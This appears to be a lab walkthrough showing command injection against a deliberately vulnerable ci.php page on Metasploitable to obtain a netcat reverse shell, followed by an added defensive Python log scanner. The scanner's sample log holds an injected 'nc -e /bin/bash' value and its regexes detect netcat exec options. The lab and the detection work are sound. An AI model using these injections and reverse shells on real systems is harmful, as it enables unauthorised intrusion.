COMMAND INJECTION (II): REVERSE SHELL CONNECTION WITH NETCAT
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqJkOS7y2yxJRn1SWqE95kYpFW-H6qgDFuZKY1nFdjheTsPbCcikqVDHVx737wBnZLQCWeOyIbBe1HOvgaGSIujt5eWMCHMiQsu697veIyDEJhqEJxEO8mlFHqnSeAkt4DGVOIJZGBwDEz/s1600/screenshot.27.jpg)
- This exercise is based on the previous one:
http://www.whitelist1.com/2018/04/command-injection-attack.html
- Now, the goal is to perform a Command Injection attack from the web browser of the attacker Kali Linux against the victim Metasploitable, injecting NetCat commands:
https://en.wikipedia.org/wiki/Netcat
- Three of the most interesting characteristics of this attack are:
  - No file is uploaded to the victim, so the detection rate would be low
  - No need for write permissions on the web server folder on the victim's side
  - The tool (NetCat) is usually present on most Linux/Windows machines
- First, let's check that ci.php (which allows Command Injection due to lack of input sanitization, as seen in the previous exercise) is available in the web server folder /var/www on the victim Metasploitable:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggEs7DQ4JWDYt_UZn-IPSPkCjL8ELD8LLOX3uSR7wQkS6Kv193SFiPCL3TMvCF7tEQ7hkpCQqpBd7KKpNpI4vixCDEZjVXaXFqcnhayZ2mnBxbHKVhH6UVM-_xp8irHlTSqbBGBiY_5HQq/s1600/screenshot.18.jpg)
- From Kali:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXvB616ZlY8XZygrniAZAJ2-uk7jfx4ltqJEz6qE9s_GfkLseKYJ7LRx5yCvNREAmydjDu8clcSE3UcUMqLIQsNYQI69V15aNwxE4YL24aTq68M9SVzN-Gdb9HOWEv2RQLbJn97GSbv_3g/s1600/screenshot.19.jpg)
- NetCat (nc) has two options (-c and -e), flagged as dangerous by the program itself, that execute a command and attach it to the connection:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxYpXnodUKSlKIFu1vXvtUi3cFwzoIEXG1JVhMg_ldNYV6I_ZD8FepVfQeNtjwXzsmXVwaAE8vFyhKsJwMedNdz5aW0ZKF_J7h50eGgrTp8aQWvWKMP3bAC_K9XQ88ZqOlr3YNRiJzi5du/s1600/screenshot.17.jpg)
- Setting a listening session on port 4444 at the attacker side:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqaJkEetonegogi-KlS10JOJmLYI58pYWgZIEOIzx90JoUYtYw__8JR9jaOUIqg0xZZEBK8DoqUdSpoP_dZPTXRGoDWdXH_XHmq1Vd1f5Cn3QwZyaK4fIuI626wypIie0lQmNzph1yErOJ/s400/screenshot.20.jpg)
- Now, entering through Kali's browser the NetCat command that executes a shell (/bin/bash) remotely with -e:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikncVB5jZbPv0dSUQftMuOpBsmWCiBT_TyJB6JwJqQHaiQu8LHcbFiAkNU7A2srhu057Cv351hvll9Pxk-Q9j_12w676idcxx1E6GPkAITnpDAZ3DR3r_W-rqGrD28ipp6eoh0jZfzjckg/s1600/screenshot.22.jpg)
- It is interesting to notice the Connecting notification, meaning the browser is waiting for the connection from the other side:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgppZlYT81XudCoSW1OkYMhaTMPA5QEYyGVDyAhr_c9zb9ubudHVP5AhN3y5Ct3FlMUY4gPyXede9Vt9EM9fWkDTH4eosjFAbWpbpLzizBgvpRlMUxBHD0lp-QwWshtgMhmtM8pJ2L-Mmmy/s400/screenshot.24.jpg)
- Finally, the attacker Kali obtains a reverse shell connection from the Metasploitable victim:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjisLV6X20to3-y4JTsxxMBdDOnwsNVoDv3ecb5t7Chyphenhyphen7gTk7bly0F6jSGBtKOOlawS9KzryfN7uTEQedKugarldNgJbM8qyZCrqZ5HvqSLgdvCupe3n5gd6WfCmv6d7kyIwZmQaNW6J4gs/s1600/screenshot.23.jpg)
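- As an added defender-side example (not part of the original post), this Python script scans Apache access-log lines for requests like the one used above: URL-decoded query strings carrying shell separators or a netcat invocation with -e/-c. The log lines, IP addresses and the ci.php parameter name `ip` are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample Apache access-log lines (not taken from the original post).
# The parameter name "ip" and the addresses are assumptions for the example.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Apr/2018:10:01:02 +0000] "GET /ci.php?ip=127.0.0.1 HTTP/1.1" 200 512
192.0.2.10 - - [20/Apr/2018:10:01:30 +0000] "GET /ci.php?ip=127.0.0.1%3Bnc+-e+%2Fbin%2Fbash+192.0.2.10+4444 HTTP/1.1" 200 17
192.0.2.11 - - [20/Apr/2018:10:02:05 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048
192.0.2.12 - - [20/Apr/2018:10:03:15 +0000] "GET /ci.php?ip=10.0.0.1%7C%7Cid HTTP/1.1" 200 40
"""

# Pulls source address, timestamp, method, request path and status out of a combined-log line.
REQUEST_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Shell metacharacters that let a second command be appended to the injected input.
SEPARATOR_RE = re.compile(r'[;|&`\n]|\$\(')
# Netcat invoked with its command-execution options (-e / -c), as described in the post.
NETCAT_EXEC_RE = re.compile(r'\b(?:nc|ncat|netcat)\b[^;|&]*\s-(?:e|c)\b')

def analyze_request(path):
    """Return a list of finding strings for one request path (empty if it looks clean)."""
    if "?" not in path:
        return []
    query = unquote_plus(path.split("?", 1)[1])  # decode %3B, +, %2F ... before matching
    findings = []
    if SEPARATOR_RE.search(query):
        findings.append("shell separator in query")
    if NETCAT_EXEC_RE.search(query):
        findings.append("netcat exec option (-e/-c) in query")
    return findings

def scan_log(text):
    """Return (src, path, findings) for every request that looks like command injection."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not well-formed access-log entries
        findings = analyze_request(m.group("path"))
        if findings:
            hits.append((m.group("src"), m.group("path"), findings))
    return hits

if __name__ == "__main__":
    for src, path, findings in scan_log(SAMPLE_LOG):
        print(src, path, ", ".join(findings))
```

A netcat -e hit in a web-server log is a strong signal on its own; the separator check is noisier and is best correlated with outbound connections from the web server to unusual ports.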